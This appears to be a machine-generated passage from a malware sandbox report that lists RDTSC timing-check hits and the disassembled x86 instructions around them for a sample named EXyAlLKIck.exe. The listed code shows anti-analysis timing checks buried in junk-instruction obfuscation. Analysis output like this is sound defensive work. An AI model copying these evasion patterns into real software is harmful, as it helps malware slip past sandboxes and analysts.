Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0ED7 second address: 50E0EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0EDD second address: 50E0F1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, ah 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A759h 0x0000000b sbb ax, 9DE6h 0x00000010 jmp 00007FE5B8F4A751h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0F1E second address: 50E0F24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0F24 second address: 50E0F54 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A752h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8F4A757h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50E0F54 second address: 50E0F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50F0162 second address: 50F017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50F017E second address: 50F0182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50F0182 second address: 50F0188 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51107FE second address: 5110804 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110804 second address: 5110808 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110808 second address: 511085E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007FE5B8D9CB69h 0x0000000e mov ebp, esp 0x00000010 jmp 00007FE5B8D9CB5Eh 0x00000015 xchg eax, ecx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FE5B8D9CB5Eh 0x0000001d xor cx, 1818h 0x00000022 jmp 00007FE5B8D9CB5Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 511085E second address: 51108E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov edx, eax 0x0000000b mov ah, 34h 0x0000000d popad 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 call 00007FE5B8F4A757h 0x00000017 pushfd 0x00000018 jmp 00007FE5B8F4A758h 0x0000001d sbb si, EC08h 0x00000022 jmp 00007FE5B8F4A74Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 popad 0x0000002a mov eax, dword ptr [76FA65FCh] 0x0000002f pushad 0x00000030 call 00007FE5B8F4A751h 0x00000035 push esi 0x00000036 pop edi 0x00000037 pop esi 0x00000038 popad 0x00000039 test eax, eax 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e jmp 00007FE5B8F4A74Fh 0x00000043 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51108E2 second address: 511090C instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 pop ecx 0x00000009 popad 0x0000000a je 00007FE62ABAFBD0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FE5B8D9CB68h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 511090C second address: 5110912 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110912 second address: 5110916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110916 second address: 5110936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE5B8F4A754h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110936 second address: 511093C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 511093C second address: 511095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FE5B8F4A74Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 511095E second address: 511098C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d call 00007FE5B8D9CB64h 0x00000012 push esi 0x00000013 pop edi 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 511098C second address: 5110990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110990 second address: 51109FF instructions: 0x00000000 rdtsc 0x00000002 mov edi, 164A67DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a ror eax, cl 0x0000000c jmp 00007FE5B8D9CB65h 0x00000011 leave 0x00000012 pushad 0x00000013 mov si, 5A43h 0x00000017 pushfd 0x00000018 jmp 00007FE5B8D9CB68h 0x0000001d add eax, 4C113F08h 0x00000023 jmp 00007FE5B8D9CB5Bh 0x00000028 popfd 0x00000029 popad 0x0000002a retn 0004h 0x0000002d nop 0x0000002e mov esi, eax 0x00000030 lea eax, dword ptr [ebp-08h] 0x00000033 xor esi, dword ptr [007B2014h] 0x00000039 push eax 0x0000003a push eax 0x0000003b push eax 0x0000003c lea eax, dword ptr [ebp-10h] 0x0000003f push eax 0x00000040 call 00007FE5BD73D54Ch 0x00000045 push FFFFFFFEh 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FE5B8D9CB65h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 51109FF second address: 5110AAA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FE5B8F4A757h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007FE5B8F4A759h 0x0000000f or cx, FA36h 0x00000014 jmp 00007FE5B8F4A751h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pop eax 0x0000001e jmp 00007FE5B8F4A74Eh 0x00000023 ret 0x00000024 nop 0x00000025 push eax 0x00000026 call 00007FE5BD8EB1ADh 0x0000002b mov edi, edi 0x0000002d jmp 00007FE5B8F4A750h 0x00000032 xchg eax, ebp 0x00000033 push eax 0x00000034 push edx 0x00000035 pushad 0x00000036 mov bx, 40A0h 0x0000003a pushfd 0x0000003b jmp 00007FE5B8F4A759h 0x00000040 or ax, 5FA6h 0x00000045 jmp 00007FE5B8F4A751h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110AAA second address: 5110AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110AB0 second address: 5110AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 5110AB4 second address: 5110AB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0011 second address: 50C0069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FE5B8F4A753h 0x0000000b jmp 00007FE5B8F4A753h 0x00000010 popfd 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FE5B8F4A756h 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FE5B8F4A74Eh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0069 second address: 50C00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 7C67BCF4h 0x00000008 mov edx, 55BDB460h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 jmp 00007FE5B8D9CB5Fh 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FE5B8D9CB65h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C00A2 second address: 50C0169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 mov ecx, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a and esp, FFFFFFF8h 0x0000000d pushad 0x0000000e jmp 00007FE5B8F4A74Bh 0x00000013 call 00007FE5B8F4A758h 0x00000018 movzx ecx, dx 0x0000001b pop edx 0x0000001c popad 0x0000001d xchg eax, ecx 0x0000001e jmp 00007FE5B8F4A74Ah 0x00000023 push eax 0x00000024 jmp 00007FE5B8F4A74Bh 0x00000029 xchg eax, ecx 0x0000002a pushad 0x0000002b mov si, 6E6Bh 0x0000002f jmp 00007FE5B8F4A750h 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007FE5B8F4A750h 0x0000003b push eax 0x0000003c jmp 00007FE5B8F4A74Bh 0x00000041 xchg eax, ebx 0x00000042 jmp 00007FE5B8F4A756h 0x00000047 mov ebx, dword ptr [ebp+10h] 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d pushfd 0x0000004e jmp 00007FE5B8F4A74Dh 0x00000053 add eax, 027876F6h 0x00000059 jmp 00007FE5B8F4A751h 0x0000005e popfd 0x0000005f mov ah, 5Fh 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0169 second address: 50C017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C017E second address: 50C0182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0182 second address: 50C0186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0186 second address: 50C018C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C018C second address: 50C01CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx ebx, ax 0x0000000e pushfd 0x0000000f jmp 00007FE5B8D9CB5Ah 0x00000014 xor ecx, 7CDEB9A8h 0x0000001a jmp 00007FE5B8D9CB5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, esi 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov cx, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C01CF second address: 50C01D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C01D5 second address: 50C020E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FE5B8D9CB61h 0x00000010 xchg eax, edi 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FE5B8D9CB68h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C020E second address: 50C0214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0214 second address: 50C0264 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FE5B8D9CB5Ch 0x00000009 or al, FFFFFFC8h 0x0000000c jmp 00007FE5B8D9CB5Bh 0x00000011 popfd 0x00000012 mov dl, al 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 mov di, si 0x0000001c push esi 0x0000001d mov dh, 2Fh 0x0000001f pop eax 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 jmp 00007FE5B8D9CB5Bh 0x00000027 test esi, esi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FE5B8D9CB60h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0264 second address: 50C026A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C026A second address: 50C0348 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, ecx 0x00000005 call 00007FE5B8D9CB68h 0x0000000a pop esi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007FE62ABFAEE0h 0x00000014 jmp 00007FE5B8D9CB61h 0x00000019 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000020 pushad 0x00000021 pushad 0x00000022 mov esi, 414305A9h 0x00000027 jmp 00007FE5B8D9CB66h 0x0000002c popad 0x0000002d jmp 00007FE5B8D9CB62h 0x00000032 popad 0x00000033 je 00007FE62ABFAEA7h 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FE5B8D9CB5Eh 0x00000040 and esi, 7F616FD8h 0x00000046 jmp 00007FE5B8D9CB5Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FE5B8D9CB68h 0x00000052 or eax, 11D1BA38h 0x00000058 jmp 00007FE5B8D9CB5Bh 0x0000005d popfd 0x0000005e popad 0x0000005f mov edx, dword ptr [esi+44h] 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FE5B8D9CB65h 0x00000069 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0348 second address: 50C03B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FE5B8F4A74Eh 0x00000011 test edx, 61000000h 0x00000017 jmp 00007FE5B8F4A750h 0x0000001c jne 00007FE62ADA8A4Ah 0x00000022 jmp 00007FE5B8F4A750h 0x00000027 test byte ptr [esi+48h], 00000001h 0x0000002b pushad 0x0000002c pushad 0x0000002d mov edx, esi 0x0000002f popad 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 jne 00007FE62ADA8A40h 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FE5B8F4A74Ah 0x00000041 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C03B9 second address: 50C0408 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 6364h 0x00000007 pushfd 0x00000008 jmp 00007FE5B8D9CB5Dh 0x0000000d xor si, 9FA6h 0x00000012 jmp 00007FE5B8D9CB61h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b test bl, 00000007h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 call 00007FE5B8D9CB69h 0x00000026 pop esi 0x00000027 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50C0408 second address: 50C040C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B06BB second address: 50B06F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 pushfd 0x00000007 jmp 00007FE5B8D9CB5Ch 0x0000000c sub eax, 6AA96378h 0x00000012 jmp 00007FE5B8D9CB5Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d push esi 0x0000001e push edi 0x0000001f pop eax 0x00000020 pop edx 0x00000021 mov di, si 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B06F4 second address: 50B0706 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0706 second address: 50B070C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B070C second address: 50B0710 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0710 second address: 50B07A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov eax, edi 0x0000000c pushad 0x0000000d push edi 0x0000000e pop esi 0x0000000f mov dx, E650h 0x00000013 popad 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007FE5B8D9CB5Fh 0x0000001c and esp, FFFFFFF8h 0x0000001f pushad 0x00000020 call 00007FE5B8D9CB5Bh 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ebx 0x00000028 jmp 00007FE5B8D9CB62h 0x0000002d push eax 0x0000002e pushad 0x0000002f movsx ebx, si 0x00000032 movzx esi, di 0x00000035 popad 0x00000036 xchg eax, ebx 0x00000037 pushad 0x00000038 pushfd 0x00000039 jmp 00007FE5B8D9CB5Bh 0x0000003e or ecx, 2D6BE0BEh 0x00000044 jmp 00007FE5B8D9CB69h 0x00000049 popfd 0x0000004a mov di, cx 0x0000004d popad 0x0000004e xchg eax, esi 0x0000004f jmp 00007FE5B8D9CB5Ah 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov bh, C2h 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B07A7 second address: 50B07DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A755h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FE5B8F4A758h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B07DD second address: 50B07E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B07E3 second address: 50B07F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B07F4 second address: 50B0819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB68h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0819 second address: 50B0871 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8F4A74Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub ebx, ebx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FE5B8F4A755h 0x00000012 or ax, A326h 0x00000017 jmp 00007FE5B8F4A751h 0x0000001c popfd 0x0000001d jmp 00007FE5B8F4A750h 0x00000022 popad 0x00000023 test esi, esi 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0871 second address: 50B0875 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0875 second address: 50B087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B087B second address: 50B0925 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE5B8D9CB64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FE62AC02651h 0x0000000f jmp 00007FE5B8D9CB60h 0x00000014 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001b pushad 0x0000001c jmp 00007FE5B8D9CB5Eh 0x00000021 pushfd 0x00000022 jmp 00007FE5B8D9CB62h 0x00000027 xor ecx, 194064B8h 0x0000002d jmp 00007FE5B8D9CB5Bh 0x00000032 popfd 0x00000033 popad 0x00000034 mov ecx, esi 0x00000036 jmp 00007FE5B8D9CB66h 0x0000003b je 00007FE62AC025FCh 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007FE5B8D9CB5Dh 0x00000049 call 00007FE5B8D9CB60h 0x0000004e pop esi 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0925 second address: 50B092B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B092B second address: 50B09AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test byte ptr [76FA6968h], 00000002h 0x0000000f pushad 0x00000010 call 00007FE5B8D9CB64h 0x00000015 pop ebx 0x00000016 mov dh, cl 0x00000018 popad 0x00000019 jne 00007FE62AC025B9h 0x0000001f jmp 00007FE5B8D9CB69h 0x00000024 mov edx, dword ptr [ebp+0Ch] 0x00000027 pushad 0x00000028 mov ebx, 2173034Eh 0x0000002d popad 0x0000002e push ebx 0x0000002f jmp 00007FE5B8D9CB62h 0x00000034 mov dword ptr [esp], ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FE5B8D9CB67h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B09AB second address: 50B09B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B09B1 second address: 50B09D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE5B8D9CB66h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B09D4 second address: 50B09D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B09D8 second address: 50B09DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B09DE second address: 50B09EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE5B8F4A74Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0A4C second address: 50B0A52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EXyAlLKIck.exe RDTSC instruction interceptor: First address: 50B0A52 second address: 50B0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
